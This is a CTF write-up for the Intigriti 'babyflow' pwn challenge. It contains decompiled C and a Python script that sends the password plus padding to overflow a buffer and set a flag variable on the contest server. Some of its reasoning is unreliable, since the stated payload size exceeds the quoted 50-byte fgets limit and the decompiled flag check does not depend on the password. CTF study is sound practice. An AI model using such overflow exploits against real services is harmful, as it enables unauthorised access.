Warmup - Babyflow

Challenge

Warmup PWN Challenge: babyflow Writeup

In this writeup, we'll walk through solving the "Warmup" PWN challenge step by step. The goal is to exploit a buffer overflow vulnerability to bypass a password check and reveal the flag.

Analyzing the Binary

We start by running binary ninja to decompile the file.

We examine the decompiled code snippet:

int32_t main(int32_t argc, char** argv, char** envp)
{
    int32_t var_c = 0;
    printf("Enter password: ");
    fgets(&buf, 50, stdin);

    if (strncmp(&buf, "SuPeRsEcUrEPaSsWoRd123", 22) != 0)
        puts("Incorrect Password!");
    else
        puts("Correct Password!");

    if (var_c == 0)
        puts("Are you sure you are admin? o.O");
    else
        puts("INTIGRITI{the_flag_is_different_…}");

    return 0;
}

Trying to use the password

Key Points:

• The program asks for a password input and checks it using strncmp against the hardcoded string "SuPeRsEcUrEPaSsWoRd123".

• If the password is correct, it checks the value of var_c.

  • If var_c is still 0, it prints a message asking if you are the admin.

  • If var_c is non-zero, it reveals the flag.

Step 2: Crafting the Exploit

We need to:

1. Input the correct password to pass the check.

2. Overflow the buffer to modify var_c and set it to a non-zero value, which will reveal the flag.

Buffer Overflow:

• The buffer size is 50 bytes, and the password takes up the first 22 bytes.

• That leaves 28 bytes for padding and overflow.

• We need to overflow into var_c (a 4-byte integer) and set it to 1.

Step 3: Writing the Python Exploit

Now, let's write a Python script to send the payload to the server.

import socket

# Connect to the remote server
host = 'babyflow.ctf.intigriti.io'
port = 1331

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# Receive and print the initial message
response = s.recv(1024).decode('utf-8')
print(response)

# Prepare the exploit payload
password = "SuPeRsEcUrEPaSsWoRd123"
padding = "A" * (50 - len(password))  # Fill the buffer space
overflow_payload = padding + "\x01\x00\x00\x00"  # Overwrite var_c with 1

# Send the payload
s.sendall((password + overflow_payload + "\n").encode('utf-8'))

# Receive and print the flag
response = s.recv(1024).decode('utf-8')
print(response)

# Close the connection
s.close()

Step 4: Running the Exploit

Once the script is ready, simply run it using:

python babyflow.py

If the exploit is successful, the program will print the flag:

Conclusion

This challenge demonstrates a classic buffer overflow attack. We bypass the password check by inputting the correct password, then overflow the buffer to manipulate a local variable (var_c). When var_c is changed from 0 to 1, the program reveals the flag.

By following these steps, we successfully exploited the vulnerability and obtained the flag. This writeup covers the basic principles of exploiting buffer overflows in C programs and how to automate the process using Python.